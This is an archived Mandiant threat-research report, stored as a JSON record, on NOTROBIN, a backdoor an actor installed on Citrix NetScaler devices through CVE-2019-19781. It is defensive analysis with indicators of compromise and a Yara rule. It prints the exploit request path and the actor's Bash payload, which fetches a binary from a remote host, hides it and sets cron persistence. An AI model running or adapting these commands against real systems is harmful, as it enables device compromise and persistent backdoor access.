{
	"id": "e33769be-c310-4a0e-a32a-8e88be211fd5",
	"created_at": "2026-04-06T00:20:51.97116Z",
	"updated_at": "2026-04-10T13:12:00.258014Z",
	"deleted_at": null,
	"sha1_hash": "8fe71842f2b009b3ea922d8cf27cfcda409aaaf1",
	"title": "Vigilante Deploying Mitigation for Citrix NetScaler Vulnerability While Maintaining Backdoor | Mandiant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 372661,
	"plain_text": "Vigilante Deploying Mitigation for Citrix NetScaler Vulnerability\r\nWhile Maintaining Backdoor | Mandiant\r\nBy Mandiant\r\nPublished: 2020-01-15 · Archived: 2026-04-02 12:08:55 UTC\r\nWritten by: William Ballenthin, Josh Madeley\r\nAs noted in Rough Patch: I Promise It'll Be 200 OK, our FireEye Mandiant Incident Response team has been hard\r\nat work responding to intrusions stemming from the exploitation of CVE-2019-19781. After analyzing dozens of\r\nsuccessful exploitation attempts against Citrix ADCs that did not have the Citrix mitigation steps implemented,\r\nwe’ve recognized multiple groups of post-exploitation activity. Within these, something caught our eye: one\r\nparticular threat actor that’s been deploying a previously-unseen payload for which we’ve created the code family\r\nNOTROBIN.\r\nUpon gaining access to a vulnerable NetScaler device, this actor cleans up known malware and deploys\r\nNOTROBIN to block subsequent exploitation attempts! But all is not as it seems, as NOTROBIN maintains\r\nbackdoor access for those who know a secret passphrase. FireEye believes that this actor may be quietly collecting\r\naccess to NetScaler devices for a subsequent campaign.\r\nInitial Compromise\r\nThis actor exploits NetScaler devices using CVE-2019-19781 to execute shell commands on the compromised\r\ndevice. They issue an HTTP POST request from a Tor exit node to transmit the payload to the vulnerable\r\nnewbm.pl CGI script. For example, Figure 1 shows a web server access log entry recording exploitation:\r\n127.0.0.2 - - \"POST\r\n/vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1\" 304 - \"-\" \"curl/7.67.0\"\r\nFigure 1: Web log showing exploitation\r\nUnlike other actors, this actor appears to exploit devices using a single HTTP POST request that results in an\r\nHTTP 304 response—there is no observed HTTP GET to invoke staged commands. Unfortunately, we haven’t\r\nrecovered the POST body contents to see how it works. 
In any case, exploitation causes the Bash one-liner shown\r\nin Figure 2 to run on the compromised system:\r\npkill -9 netscalerd; rm /var/tmp/netscalerd; mkdir /tmp/.init; curl -k\r\nhxxps://95.179.163[.]186/wp-content/uploads/2018/09/64d4c2d3ee56af4f4ca8171556d50faa -o\r\n/tmp/.init/httpd; chmod 744 /tmp/.init/httpd; echo \"* * * * *\r\n/var/nstmp/.nscache/httpd\" | crontab -; /tmp/.init/httpd \u0026\"\r\nhttps://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html\r\nPage 1 of 7\n\nFigure 2: Bash exploit payload\r\nThis is the same methodology as described in Rough Patch: I Promise It'll Be 200 OK. This series of\r\ncommands has the following effects:\r\n1. Kills and deletes all running instances of netscalerd—a common process name used for cryptocurrency\r\nmining utilities deployed to NetScaler devices.\r\n2. Creates a hidden staging directory /tmp/.init, downloads NOTROBIN to it, and enables the execute\r\npermission.\r\n3. Installs /var/nstmp/.nscache/httpd for persistence via the cron daemon. This is the path to which\r\nNOTROBIN will copy itself.\r\n4. Manually executes NOTROBIN.\r\nThere’s a lot to unpack here. Of note, the actor removes malware known to target NetScaler devices via the CVE-2019-19781 vulnerability. Cryptocurrency miners are generally easy to identify—just look for the process utilizing\r\nnearly 100% of the CPU. By uninstalling these unwanted utilities, the actor may hope that administrators overlook\r\nan obvious compromise of their NetScaler devices.\r\nThe actor uses curl to fetch NOTROBIN from the hosting server with IP address 95.179.163[.]186, which appears to\r\nbe an abandoned WordPress site. FireEye has identified many payloads hosted on this server, each named after\r\nits embedded authentication key. Interestingly, we haven’t seen reuse of the same payload across multiple\r\nclients. 
Compartmenting payloads indicates the actor is exercising operational security.\r\nFireEye has recovered cron syslog entries, such as those shown in Figure 3, that confirm the persistent installation\r\nof NOTROBIN. Note that these entries appear just after the initial compromise. This is a robust indicator of\r\ncompromise to triage NetScaler devices.\r\nJan 12 21:57:00 \u003ccron.info\u003e foo.netscaler /usr/sbin/cron[73531]:\r\n(nobody) CMD (/var/nstmp/.nscache/httpd)\r\nFigure 3: cron log entry showing NOTROBIN execution\r\nNow, let’s turn our attention to what NOTROBIN does.\r\nAnalysis of NOTROBIN\r\nNOTROBIN is a utility written in Go 1.10 and compiled to a 64-bit ELF binary for BSD systems. It periodically\r\nscans for and deletes files matching filename patterns and content characteristics. The purpose seems to be to\r\nblock exploitation attempts against the CVE-2019-19781 vulnerability; however, FireEye believes that\r\nNOTROBIN provides backdoor access to the compromised system.\r\nWhen executed, NOTROBIN ensures that it is running from the path /var/nstmp/.nscache/httpd. If not, the utility\r\ncopies itself to this path, spawns the new copy, and then exits itself. This provides detection cover by migrating\r\nthe process from /tmp/, a suspicious place for long-running processes to execute, to an apparently NetScaler-related, hidden directory.\r\nNow the fun begins: it spawns two routines that periodically check for and delete exploits.\r\nEvery second, NOTROBIN searches the directory /netscaler/portal/scripts/ for entries created within the last 14\r\ndays and deletes them, unless the filename or file content contains a hardcoded key (example:\r\n64d4c2d3ee56af4f4ca8171556d50faa). 
Open source reporting indicates that some actors write scripts into this\r\ndirectory after exploiting CVE-2019-19781. Therefore, we believe that this routine cleans the system of publicly\r\nknown payloads, such as PersonalBookmark.pl.\r\nEight times per second, NOTROBIN searches for files with an .xml extension in the directory\r\n/netscaler/portal/templates/. This is the directory into which exploits for CVE-2019-19781 write templates\r\ncontaining attacker commands. NOTROBIN deletes files that contain either of the strings block or BLOCK,\r\nwhich likely match potential exploit code, such as that found in the ProjectZeroIndia exploit; however, the utility\r\ndoes not delete files with a filename containing the secret key.\r\nFireEye believes that actors deploy NOTROBIN to block exploitation of the CVE-2019-19781 vulnerability while\r\nmaintaining backdoor access to compromised NetScaler devices. The mitigation works by deleting staged exploit\r\ncode found within NetScaler templates before it can be invoked. However, when the actor provides the hardcoded\r\nkey during subsequent exploitation, NOTROBIN does not remove the payload. This lets the actor regain access to\r\nthe vulnerable device at a later time.\r\nAcross multiple investigations, FireEye observed actors deploying NOTROBIN with unique keys. For example,\r\nwe’ve recovered nearly 100 keys from different binaries. These look like MD5 hashes, though FireEye has been\r\nunsuccessful in recovering any plaintext. Using complex, unique keys makes it difficult for third parties, such as\r\ncompeting attackers or FireEye, to easily scan for NetScaler devices “protected” by NOTROBIN. This actor\r\nfollows a strong password policy!\r\nBased on strings found within NOTROBIN, the actor appears to inject the key into the Go project using source\r\ncode files named after the key. 
Figure 4 and Figure 5 show examples of these filenames.\r\n/tmp/b/.tmpl_ci/64d4c2d3ee56af4f4ca8171556d50faa.go\r\nFigure 4: Source filename recovered from NOTROBIN sample\r\n/root/backup/sources/d474a8de77902851f96a3b7aa2dcbb8e.go\r\nFigure 5: Source filename recovered from NOTROBIN sample\r\nWe wonder if “tmpl_ci” refers to a Continuous Integration setup that applies source code templating to inject keys\r\nand build NOTROBIN variants. We also hope the actor didn’t have to revert to backups after losing the original\r\nsource!\r\nOutstanding Questions\r\nNOTROBIN spawns a background routine that listens on UDP port 18634 and receives data; however, it drops the\r\ndata without inspecting it. You can see this logic in Figure 6. FireEye has not uncovered a purpose for this\r\nbehavior, though DCSO makes a strong case for this being used as a mutex, as only a single listener can be active\r\non this port.\r\nFigure 6: NOTROBIN logic that drops UDP traffic\r\nThere is also an empty function main.install_cron whose implementation has been removed; alternatively,\r\nperhaps these are vestiges of an early version of NOTROBIN. In any case, a NetScaler device listening on UDP\r\nport 18634 is a reliable indicator of compromise. Figure 7 shows an example of listing the open file handles on a\r\ncompromised NetScaler device, including a port listening on UDP 18634.\r\nFigure 7: File handle listing of compromised NetScaler device\r\nNOTROBIN Efficacy\r\nDuring one engagement, FireEye reviewed forensic evidence of NetScaler exploitation attempts against a single\r\ndevice, both before and after NOTROBIN was deployed by an actor. Prior to January 12, before NOTROBIN was\r\ninstalled, we identified successful attacks from multiple actors. 
But across the following three days, more than a\r\ndozen exploitation attempts were thwarted by NOTROBIN. In other words, NOTROBIN inoculated the\r\nvulnerable device against further compromise. For example, Figure 8 shows a log message that records a failed\r\nexploitation attempt.\r\n127.0.0.2 - - \"GET\r\n/vpn/../vpns/portal/wTyaINaDVPaw8rmh.xml HTTP/1.1\" 404 48 \"-\"\r\n\"curl/7.47.0\"\r\nFigure 8: Web log entry showing a failed exploitation attempt\r\nNote that the application server responded with HTTP 404 (“Not Found”) as this actor attempted to invoke their\r\npayload staged in the template wTyaINaDVPaw8rmh.xml. NOTROBIN deleted the malicious template shortly\r\nafter it was created, and before it could be used by the other actor.\r\nFireEye has not yet identified if the actor has returned to NOTROBIN backdoors.\r\nConclusion\r\nFireEye believes that the actor behind NOTROBIN has been opportunistically compromising NetScaler devices,\r\npossibly to prepare for an upcoming campaign. They remove other known malware, potentially to avoid detection\r\nby administrators that check into their devices after reading Citrix security bulletin CTX267027. NOTROBIN\r\nmitigates CVE-2019-19781 on compromised devices but retains a backdoor for an actor with a secret key. While\r\nwe haven’t seen the actor return, we’re skeptical that they will remain a Robin Hood character protecting the\r\ninternet from the shadows.\r\nIndicators of Compromise and Discovery\r\nTable 1 lists indicators that match NOTROBIN variants that FireEye has identified. The domain vilarunners[.]cat\r\nis the WordPress site that hosted NOTROBIN payloads. The domain resolved to 95.179.163[.]186 during the time\r\nof observed activity. 
As of January 15, the vilarunners[.]cat domain resolves to a new IP address,\r\n80.240.31[.]218.\r\nIOC Item | Value\r\nHTTP URL prefix | hxxps://95[.]179.163.186/wp-content/uploads/2018/09/\r\nDirectory | /var/nstmp/.nscache\r\nFilename | /var/nstmp/.nscache/httpd\r\nDirectory | /tmp/.init\r\nFilename | /tmp/.init/httpd\r\nCrontab entry | /var/nstmp/.nscache/httpd\r\nListening UDP port | 18634\r\nRemote IP | 95.179.163[.]186\r\nRemote IP | 80.240.31[.]218\r\nDomain | vilarunners[.]cat\r\nTable 1: Indicators of Compromise\r\nDiscovery on VirusTotal\r\nYou can use the following VTI queries to identify NOTROBIN variants on VirusTotal:\r\nvhash:\"73cee1e8e1c3265c8f836516c53ae042\"\r\nvhash:\"e57a7713cdf89a2f72c6526549d22987\"\r\nNote that the vHash implementation is private, so we’re not able to confirm why this technique works. In practice, the\r\nvHashes cover the same variants identified by the Yara rule listed in Figure 9.\r\nrule NOTROBIN\r\n{\r\n    meta:\r\n        author = \"william.ballenthin@fireeye.com\"\r\n        date_created = \"2020-01-15\"\r\n    strings:\r\n        $func_name_1 = \"main.remove_bds\"\r\n        $func_name_2 = \"main.xrun\"\r\n    condition:\r\n        all of them\r\n}\r\nFigure 9: Yara rule that matches on NOTROBIN variants\r\nRecovered Authentication Keys\r\nFireEye has identified nearly 100 hardcoded keys from NOTROBIN variants that the actor could use to re-enter\r\ncompromised environments. We expect that these strings may be found within subsequent exploitation attempts,\r\neither as filenames or payload content. 
Although we won’t publish them here out of concern for our customers,\r\nplease reach out if you’re looking for NOTROBIN within your environment and we can provide a list.\r\nAcknowledgements\r\nThank you to analysts across FireEye that are currently responding to this activity, including Brandan Schondorfer\r\nfor collecting and interpreting artifacts, Steven Miller for coordinating analysis, Evan Reese for pivoting across\r\nintel leads, Chris Glyer for reviewing technical aspects, Moritz Raabe for reverse engineering NOTROBIN\r\nsamples, and Ashley Frazer for refining the presentation and conclusions.\r\nSource: https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html"
	],
	"report_names": [
		"vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e16a6567-2b9a-4419-960b-1e03fccc8812",
			"created_at": "2023-01-06T13:46:39.128684Z",
			"updated_at": "2026-04-10T02:00:03.224215Z",
			"deleted_at": null,
			"main_name": "NOTROBIN",
			"aliases": [],
			"source_name": "MISPGALAXY:NOTROBIN",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434851,
	"ts_updated_at": 1775826720,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8fe71842f2b009b3ea922d8cf27cfcda409aaaf1.pdf",
		"text": "https://archive.orkl.eu/8fe71842f2b009b3ea922d8cf27cfcda409aaaf1.txt",
		"img": "https://archive.orkl.eu/8fe71842f2b009b3ea922d8cf27cfcda409aaaf1.jpg"
	}
}